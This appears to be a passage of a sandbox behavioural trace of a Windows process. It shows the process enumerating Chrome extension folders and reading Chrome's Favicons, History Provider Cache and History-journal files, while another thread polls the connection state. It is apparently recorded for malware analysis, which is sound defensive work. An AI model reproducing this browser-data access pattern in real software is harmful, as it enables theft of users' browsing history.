| 07:44:35,385 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:35,385 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:35,495 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\_locales\se\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:35,495 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x90I\x1bm\xe0\x91\xcf\x01p\x91*m\xe0\x91\xcf\x01\x90I\x1bm\xe0\x91\xcf\x01\x90I\x1bm\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00\x90I\x1bm\xe0\x91\xcf\x01*\xc3\x1bm\xe0\x91\xcf\x01\x00\xe7\x10.\x9f\xcb\xcc\x01\xc0\xd0\x1cm\xe0\x91\xcf\x01\xd2\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:35,495 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:35,495 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:35,576 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\_locales\sk\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:35,576 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xc0\xd0\x1cm\xe0\x91\xcf\x01p\x91*m\xe0\x91\xcf\x01\xc0\xd0\x1cm\xe0\x91\xcf\x01\xc0\xd0\x1cm\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00\xc0\xd0\x1cm\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x01\xde\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:35,576 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:35,576 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:35,656 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\_locales\sl\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:35,656 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xc0\xd0\x1cm\xe0\x91\xcf\x01p\x91*m\xe0\x91\xcf\x01\xc0\xd0\x1cm\xe0\x91\xcf\x01\xc0\xd0\x1cm\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00\xc0\xd0\x1cm\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x01\xea\x00\x00\x00\x00\x00\x00\x00\xf0\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:35,656 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:35,656 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:35,736 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\_locales\sr\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:35,736 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xf0W\x1em\xe0\x91\xcf\x01p\x91*m\xe0\x91\xcf\x01\xf0W\x1em\xe0\x91\xcf\x01\xf0W\x1em\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00\xf0W\x1em\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x01'\x01\x00\x00\x00\x00\x00\x00(\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:35,736 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:35,736 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:35,816 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\_locales\th\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:35,816 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xf0W\x1em\xe0\x91\xcf\x01p\x91*m\xe0\x91\xcf\x01 \xdf\x1fm\xe0\x91\xcf\x01 \xdf\x1fm\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00 \xdf\x1fm\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x01D\x01\x00\x00\x00\x00\x00\x00H\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:35,816 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:35,816 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:35,896 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\_locales\tr\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:35,906 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00 \xdf\x1fm\xe0\x91\xcf\x01p\x91*m\xe0\x91\xcf\x01 \xdf\x1fm\xe0\x91\xcf\x01 \xdf\x1fm\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00 \xdf\x1fm\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x01\xea\x00\x00\x00\x00\x00\x00\x00\xf0\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:35,906 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:35,906 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:35,986 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\_locales\uk\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:35,986 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00 \xdf\x1fm\xe0\x91\xcf\x01p\x91*m\xe0\x91\xcf\x01Pf!m\xe0\x91\xcf\x01Pf!m\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00Pf!m\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x01\xf0\xca6m\xe0\x91\xcf\x010\x01\x00\x00\x00\x00\x00\x000\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:35,986 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:35,986 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:36,066 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\_locales\vi\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:36,066 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00Pf!m\xe0\x91\xcf\x01p\x91*m\xe0\x91\xcf\x01Pf!m\xe0\x91\xcf\x01Pf!m\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00Pf!m\xe0\x91\xcf\x01 R8m\xe0\x91\xcf\x01 R8m\xe0\x91\xcf\x01 R8m\xe0\x91\xcf\x01\xe8\x00\x00\x00\x00\x00\x00\x00\xe8\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:36,066 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:36,066 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:36,146 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\_locales\zh_CN\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:36,146 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00Pf!m\xe0\x91\xcf\x01p\x91*m\xe0\x91\xcf\x01\x80\xed"m\xe0\x91\xcf\x01\x80\xed"m\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00\x80\xed"m\xe0\x91\xcf\x01 R8m\xe0\x91\xcf\x01 R8m\xe0\x91\xcf\x01 R8m\xe0\x91\xcf\x01\x02\x01\x00\x00\x00\x00\x00\x00\x08\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:36,146 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:36,146 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:36,186 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:36,186 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:36,186 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:36,186 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:36,186 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:36,227 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\_locales\zh_TW\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:36,227 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x80\xed"m\xe0\x91\xcf\x01p\x91*m\xe0\x91\xcf\x01\x80\xed"m\xe0\x91\xcf\x01\x80\xed"m\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00\x80\xed"m\xe0\x91\xcf\x01 R8m\xe0\x91\xcf\x01 R8m\xe0\x91\xcf\x01 R8m\xe0\x91\xcf\x01\xf9\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:36,227 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:36,227 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:36,227 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:36,307 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\__MACOSX\*.* |
SUCCESS | 0x0016be80 | |
| 07:44:36,307 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x80\xae\xa8l\xe0\x91\xcf\x01@ )m\xe0\x91\xcf\x01P\x9a\xbfl\xe0\x91\xcf\x01P\x9a\xbfl\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00_\x00C\x00N\x00\x00\x00\x00\x00\x00\x00\x00\x00P\x9a\xbfl\xe0\x91\xcf\x01P\x9a\xbfl\xe0\x91\xcf\x01P\x9a\xbfl\xe0\x91\xcf\x01P\x9a\xbfl\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00_\x00l\x00o\x00c\x00a\x00l\x00e\x00s\x00 |
SUCCESS | 0x00000000 | |
| 07:44:36,307 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:36,387 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\__MACOSX\_locales\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:36,387 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00P\x9a\xbfl\xe0\x91\xcf\x01P\x9a\xbfl\xe0\x91\xcf\x01P\x9a\xbfl\xe0\x91\xcf\x01P\x9a\xbfl\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:44:36,387 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:36,387 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:36,387 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:36,387 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c8 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:36,387 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001bc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:36,397 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Favicons DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:44:36,427 | 504 | NtReadFile |
Buffer => SQLite format 3\x00\x08\x00\x01\x01\x00@ \x00\x00\x00\x05\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00-\xe2\x1e
\x07\xfc\x00 \x03\xe2\x00\x07k\x07\xd3\x06\xe4\x06c\x05\x88\x05\x14\x04\xa3\x04W\x03\xe2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:44:36,988 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:36,988 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:36,988 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:36,988 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:36,988 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:37,068 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001bc |
FAILURE | 3221225489 | |
| 07:44:37,078 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Favicons-journal DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:44:37,108 | 504 | NtReadFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:44:37,198 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001bc |
FAILURE | 3221225489 | |
| 07:44:37,208 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\History Provider Cache DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:44:37,218 | 504 | NtReadFile |
Buffer => \x08\xde\xae\xeb\xe3\xb3\xec\x96\x17\x10\x04\x18\x00"\x91\x0e\x08\xda\x01\x12\x07browser\x12\x06chrome\x12\x03com\x12\x02en\x12\x06google\x12\x05https\x12\x04intl\x12\x03www\x12\x04home\x12\x04http\x12 microsoft\x12\x05brand\x12\x04chma\x12\x02ha\x12\x02hl\x12\x04html\x12\x05index\x12\x02na\x12\x02sk\x12\x02us\x12\x0cutm_campaign\x12
utm_medium\x12
utm_source\x12\x08utm_term\x12\x016\x12\x02ar\x12\x03dll\x12\x02ie\x12\x05isapi\x12\x07msnhome\x12\x03prd\x12\x04pver\x12\x05redir\x12\x010\x1220l10.5327.805 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:44:37,278 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001bc |
FAILURE | 3221225489 | |
| 07:44:37,288 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\History-journal DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:44:37,298 | 504 | NtReadFile |
